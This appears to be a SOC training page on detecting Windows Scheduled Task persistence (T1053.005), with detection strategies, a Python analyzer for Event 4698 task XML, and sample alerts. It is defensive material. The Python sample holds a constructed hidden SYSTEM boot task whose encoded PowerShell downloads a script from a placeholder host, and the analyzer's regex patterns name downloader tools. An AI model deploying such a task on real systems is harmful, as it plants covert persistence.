T1053.005 | Persistence | Medium difficulty

Scheduled Task

Scheduled Task (T1053.005) is a MITRE ATT&CK technique in the Persistence tactic. SOC analysts detect it by monitoring XDR and SIEM events for behavioral anomalies and for the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.

Data sources: XDR, SIEM

What is Scheduled Task?

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility interacts with the Task Scheduler from the command line. The Task Scheduler can also be opened through the GUI within the System Tools section of the Management Console. The Task Scheduler allows the execution of programs on system startup, on a scheduled basis, or based on event triggers. Many legitimate applications use the Task Scheduler for routine maintenance, updates, and housekeeping. This makes distinguishing malicious scheduled tasks from legitimate ones challenging without examining the command being executed, the account under which the task runs, and whether the creation of the task was authorized through change management processes. Attackers often name tasks to mimic legitimate Windows tasks and use encoded commands to obscure the true nature of the scheduled action.

Scheduled Task is documented as technique T1053.005 in the MITRE ATT&CK knowledge base under the Persistence tactic. Detection requires visibility into XDR and SIEM telemetry.

Detection Strategies

The following detection strategies help SOC analysts identify Scheduled Task activity. These methods apply across XDR and SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.

  1. Examine newly created scheduled task XML definitions for tasks using Base64-encoded PowerShell commands, tasks executing from temporary directories, and tasks configured to run with SYSTEM or elevated account credentials without a business justification.

  2. Monitor Windows Event ID 4698 for scheduled task creation and Event ID 4702 for modification, correlating with the creating process and user account to identify tasks created through unusual means such as via mshta.exe or office applications.

  3. Detect scheduled tasks created to run at logon or system startup from non-standard paths such as user AppData directories, temporary folders, or ProgramData subdirectories not associated with known software products.

  4. Alert on scheduled tasks that download content from the internet during execution, using command lines containing PowerShell Invoke-WebRequest, certutil download flags, or bitsadmin transfer jobs embedded within the task action.

  5. Implement baseline comparison for scheduled tasks on server and workstation images, alerting on any tasks present in the environment that do not appear in the approved baseline configuration for that system type.
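To make strategies 1 through 4 concrete, here is an added Python example (not part of this page or of SOCSimulator's tooling) that parses the TaskContent XML carried in a Windows Security Event ID 4698, decodes any -EncodedCommand argument, and counts which of the indicators above fire. Both task XML samples are constructed, and the example.invalid URL is a placeholder.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Namespace of the TaskContent XML carried in Security Event ID 4698 (creation) and 4702 (update)
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
DOWNLOADERS = re.compile(r"invoke-webrequest|downloadstring|certutil.*-urlcache|bitsadmin.*/transfer", re.I)
SUSPICIOUS_PATHS = re.compile(r"\\(temp|appdata|programdata)\\", re.I)

def decode_encoded_command(arguments):
    """Plaintext of a -EncodedCommand/-enc/-e argument (Base64 of UTF-16LE), or None if absent/invalid."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", arguments, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_task_xml(task_xml):
    """Evaluate one 4698 TaskContent document against the indicators from the strategies above."""
    root = ET.fromstring(task_xml)
    cmd = " ".join(e.text or "" for e in root.iterfind(".//t:Exec/t:Command", NS))
    args = " ".join(e.text or "" for e in root.iterfind(".//t:Exec/t:Arguments", NS))
    decoded = decode_encoded_command(args)
    effective = " ".join(filter(None, [cmd, args, decoded]))  # what the task actually runs
    user = (root.findtext(".//t:Principal/t:UserId", "", NS) or "").upper()
    findings = {
        "encoded_powershell": decoded is not None,
        "downloads_content": bool(DOWNLOADERS.search(effective)),
        "suspicious_path": bool(SUSPICIOUS_PATHS.search(effective)),
        "runs_as_system": user in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"),
        "startup_or_logon": any(root.find(f".//t:{t}", NS) is not None for t in ("BootTrigger", "LogonTrigger")),
    }
    findings["score"] = sum(findings.values())  # count of indicators that fired
    findings["decoded_command"] = decoded       # surfaced for the analyst, not scored
    return findings

# Constructed samples, not real telemetry: a task mimicking an Edge updater whose encoded action
# downloads a script into ProgramData at boot as SYSTEM, and a nightly backup job for contrast.
_PLAIN = "Invoke-WebRequest http://example.invalid/u.ps1 -OutFile C:\\ProgramData\\Upd\\u.ps1"
_ENC = base64.b64encode(_PLAIN.encode("utf-16-le")).decode()
SUSPICIOUS_TASK = f"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command>
    <Arguments>-NoP -W Hidden -EncodedCommand {_ENC}</Arguments></Exec></Actions></Task>"""
BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>CORP\\svc-backup</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Backup\\backup.exe</Command></Exec></Actions></Task>"""
```

In a SIEM, the same checks map onto the EventData TaskContent field of 4698, with the score feeding a severity threshold; strategy 5's baseline comparison then suppresses known tasks before scoring.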

Example Alerts

These realistic alert examples show what Scheduled Task looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.

Severity: High | Source: SIEM

Scheduled Task with Encoded PowerShell Created at Startup

Windows Event 4698 recorded creation of scheduled task "MicrosoftEdgeUpdateTaskMachineUA" via schtasks.exe on workstation WS-MKTG-044. Despite the legitimate-sounding name, the task action executes powershell.exe with -EncodedCommand containing a Base64 string that decodes to a Cobalt Strike stager. The task is configured to run at system startup under the SYSTEM account.

Severity: High | Source: XDR

Task Scheduler Used for Lateral Movement Execution

Remote scheduled task created on file server FILE-SRV-03 from an external workstation using at.exe with domain administrator credentials. The task executes a batch script uploaded to the ADMIN$ share that installs a backdoor service. Remote task creation combined with the use of domain admin credentials from a non-administrative workstation indicates compromised privileged credentials being leveraged for lateral movement.

Severity: Critical | Source: XDR

Scheduled Task Downloading Second-Stage Payload

Scheduled task triggered and executed certutil.exe to download an executable file disguised as a certificate from an external CDN. The task fires every 4 hours and the downloaded payload is immediately executed. This recurring download mechanism ensures the attacker can push updated payloads and maintains persistence even if the initially deployed malware is detected and removed between task execution cycles.

Practice Detecting Scheduled Task

SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Scheduled Task. Build detection skills with zero consequences — free forever.


Frequently Asked Questions

How do SOC analysts detect Scheduled Task?
SOC analysts detect Scheduled Task (T1053.005) by monitoring XDR and SIEM telemetry for behavioral anomalies and specific indicators. Key detection methods include examining newly created scheduled task XML definitions for tasks using Base64-encoded PowerShell commands, tasks executing from temporary directories, and tasks configured to run with SYSTEM or elevated account credentials without a business justification. SOCSimulator provides hands-on practice detecting this technique with realistic alerts.
What security tools are used to detect Scheduled Task?
Scheduled Task can be detected using XDR and SIEM platforms. XDR tools are particularly effective for this technique because they provide visibility into the persistence phase of the attack chain. SOCSimulator simulates all three tool types for hands-on training.
How common is Scheduled Task in real-world attacks?
Scheduled Task is a well-documented MITRE ATT&CK technique in the Persistence tactic. It appears in threat intelligence reports from multiple security vendors and has been observed in campaigns by various threat actor groups. SOCSimulator includes realistic Scheduled Task scenarios based on documented attack patterns, helping analysts build detection intuition.
Can I practice detecting Scheduled Task for free?
Yes. SOCSimulator offers free forever access to training scenarios, including Persistence techniques like Scheduled Task. You can investigate realistic alerts in guided Operations rooms, build detection skills with SIEM, XDR, and Firewall interfaces, and test yourself under pressure in Shift Mode. No credit card required.